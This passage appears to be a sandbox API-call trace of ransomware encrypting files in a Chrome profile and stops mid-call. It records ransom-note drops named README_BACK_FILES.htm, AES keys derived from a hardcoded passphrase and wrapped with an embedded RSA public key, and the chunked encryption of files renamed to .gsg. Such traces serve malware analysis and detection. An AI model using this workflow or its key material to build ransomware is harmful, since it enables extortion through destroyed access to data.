lpFindFileData=0x2b9d480) returned 0 [0265.316] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0265.317] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\index-dir\\readme_back_files.htm")) returned 0xffffffff [0265.318] AreFileApisANSI () returned 1 [0265.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 128 [0265.318] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\index-dir\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\index-dir\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.321] GetFileType (hFile=0x5d4c) returned 0x1 [0265.321] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0265.322] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0265.322] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0265.322] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\readme_back_files.htm")) returned 0xffffffff [0265.323] AreFileApisANSI () returned 1 [0265.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 118 [0265.323] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.325] GetFileType (hFile=0x5d40) returned 0x1 [0265.325] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0265.327] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0265.327] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.327] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\readme_back_files.htm")) returned 0xffffffff [0265.327] AreFileApisANSI () returned 1 [0265.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0265.327] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.345] GetFileType (hFile=0x5d48) returned 0x1 [0265.345] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0265.346] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.346] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fb00 [0265.349] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.349] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.349] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0265.349] GetLastError () returned 0x0 [0265.350] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000003.ldb")) returned 0x20 [0265.350] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb", dwFileAttributes=0x80) returned 1 [0265.351] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000003.ldb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.352] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\000003.ldb.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.353] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000003.ldb.gsg", dwFileAttributes=0x2) returned 1 [0265.353] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2e7a500) returned 1 [0265.356] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0265.356] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.356] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.356] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7e9c0) returned 1 [0265.356] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.356] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0265.356] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2e76b18) returned 1 [0265.357] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76b18, dwCertEncodingType=0x1, pInfo=0x2eb1110*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1140*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1148*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7f000) returned 1 [0265.357] CryptEncrypt (in: hKey=0x2e7f000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0265.357] CryptEncrypt (in: hKey=0x2e7f000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76c28*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2e76c28*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0265.357] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2e76c28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2e76c28*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0265.358] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.375] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.375] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.392] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.392] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.392] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.392] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.392] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.392] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.392] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.392] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.392] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.392] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.392] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.392] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.393] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.393] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.393] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.393] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.393] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.393] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.394] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.394] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.394] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.394] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.394] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.394] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.395] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.395] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.395] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.395] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.395] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.395] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.395] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, 